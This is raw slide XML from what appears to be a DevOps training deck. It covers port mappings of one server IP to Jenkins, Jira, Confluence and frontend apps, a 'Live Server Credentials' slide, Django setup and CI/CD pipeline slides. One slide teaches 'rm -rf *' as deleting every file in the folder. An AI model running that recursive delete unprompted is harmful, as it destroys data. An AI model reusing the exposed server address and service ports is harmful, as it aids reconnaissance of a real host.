              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Port Range 0 - 65536</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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t/>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>10000 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>NextJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>20000 -&gt; ReactJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; VueJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:8080  -&gt; Jenkins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:9090  -&gt; Jira</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1760">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>38.242.236.173:3030  -&gt; Confluence (Product Managers)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1760">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="38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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to delete a file in linux?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="1161750"/>
            <a:ext cx="8170200" cy="2758200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>rm </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;option&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;location&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3900">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>rm   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>-rf</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> 			</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3900">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595225" y="4291400"/>
            <a:ext cx="7789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8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* = Every file in current folder</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="320" name="Google Shape;320;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="901600" y="3239200"/>
            <a:ext cx="4085100" cy="1262700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="DC143C"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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0" name="Shape 2350"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2351" name="Google Shape;2351;p384"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="13594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Live Server Credentials</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2352" name="Google Shape;2352;p384"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271500" y="1579725"/>
            <a:ext cx="8601000" cy="22056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SzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1560">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://frontend.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1560">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -&gt; 38.242.236.173:65000 -&gt; VueJs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1560">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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385"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225350" y="1258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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CICD Pipeline </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2358" name="Google Shape;2358;p385"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="798950"/>
            <a:ext cx="9144000" cy="4344551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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386"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484375" y="1066950"/>
            <a:ext cx="8289900" cy="300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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pip install django</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>django-admin --help</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>django-admin startproject &lt;projectname&gt; &lt;directoryname&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>django-admin startproject flipkart .</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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7" name="Shape 2367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2368" name="Google Shape;2368;p387"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022425" y="929575"/>
            <a:ext cx="73869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CICD</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pipeline </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2369" name="Google Shape;2369;p387"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140650" y="3200975"/>
            <a:ext cx="35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rPr>
              <a:t>Docker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2370" name="Google Shape;2370;p387"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5017075" y="3107125"/>
            <a:ext cx="35175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rPr>
              <a:t>Source Code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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388"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="313275" y="8325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Python Version</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2376" name="Google Shape;2376;p388"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395375" y="3161875"/>
            <a:ext cx="27942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V2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2377" name="Google Shape;2377;p388"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5727750" y="3161875"/>
            <a:ext cx="2794200" cy="11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V3</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2378" name="Google Shape;2378;p388"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2140950" y="1525025"/>
            <a:ext cx="1818000" cy="1901400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2379" name="Google Shape;2379;p388"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761475" y="1534125"/>
            <a:ext cx="1860300" cy="18879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38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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2385" name="Google Shape;2385;p389"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1381075"/>
            <a:ext cx="8601000" cy="34164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SzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jira </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3060">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
